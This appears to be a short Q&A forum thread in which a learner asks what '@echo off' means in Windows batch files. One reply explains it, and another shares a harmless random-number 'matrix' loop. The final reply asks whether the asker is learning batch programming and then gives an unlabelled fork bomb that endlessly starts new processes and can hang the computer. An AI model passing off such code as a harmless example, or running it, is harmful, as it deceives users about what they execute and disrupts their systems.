+ 9
What is the @echo off ?
4 Respostas
+ 6
When you open CMD, you will see the path of current directory i.e. C:\Users\Name
using
@echo off
CMD hides that path and commands when you run through file (bat ), giving you the clear black screen
+ 5
no
+ 3
color 02
@echo off
:tricks
echo %random%%random%%random%%random%
goto tricks
Try this matrix on your computer save it as .bat
+ 1
are you learning batch programming?
@echo off
:fork
start start
goto fork